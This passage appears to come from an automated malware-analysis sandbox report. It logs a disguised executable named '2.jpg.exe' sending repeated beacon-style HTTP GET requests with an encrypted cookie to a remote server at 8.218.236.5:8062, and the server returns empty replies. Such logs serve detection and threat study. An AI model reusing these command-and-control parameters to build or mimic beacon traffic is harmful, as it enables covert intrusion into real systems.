Apr 19, 2024 09:52:04.051944971 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:04.384380102 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
160	192.168.2.4	49896	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:04.821177006 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:05.137217999 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
161	192.168.2.4	49897	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:05.568392992 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:05.886807919 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
162	192.168.2.4	49898	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:06.333926916 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:06.664911032 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
163	192.168.2.4	49899	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:07.219130039 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:07.534831047 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
164	192.168.2.4	49900	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:08.801125050 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:09.125375032 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
165	192.168.2.4	49901	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:09.566704035 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:09.893568039 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
166	192.168.2.4	49902	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:10.324820042 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:10.649077892 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
167	192.168.2.4	49903	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:11.098809004 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:11.424015999 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
168	192.168.2.4	49904	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:11.856529951 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:12.177872896 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
169	192.168.2.4	49905	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:12.597721100 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:12.915949106 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
170	192.168.2.4	49906	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:13.348959923 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:13.667537928 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
171	192.168.2.4	49907	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:14.103409052 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:14.421895027 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
172	192.168.2.4	49908	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:14.872359991 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:15.210737944 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
173	192.168.2.4	49909	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:15.628618002 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:15.942428112 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
174	192.168.2.4	49910	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:16.377012014 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:16.703568935 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
175	192.168.2.4	49911	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:17.184195042 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:17.512084007 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
176	192.168.2.4	49912	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:17.939968109 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:18.254415035 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
177	192.168.2.4	49913	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:18.701883078 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:19.042872906 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
178	192.168.2.4	49914	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:19.481570005 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:19.807029009 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
179	192.168.2.4	49915	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:20.246851921 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:20.570427895 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
180	192.168.2.4	49916	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:20.992227077 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:21.310015917 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
181	192.168.2.4	49917	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:21.748625040 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:22.070453882 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
182	192.168.2.4	49918	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:22.494339943 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:22.816891909 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
183	192.168.2.4	49919	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:23.263453007 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:23.589129925 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
184	192.168.2.4	49920	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:24.040082932 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:24.367832899 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
185	192.168.2.4	49921	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:25.451037884 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:25.765563011 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
186	192.168.2.4	49922	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:26.199136019 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:26.522624969 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
187	192.168.2.4	49923	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:26.944150925 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:27.258083105 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
188	192.168.2.4	49924	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
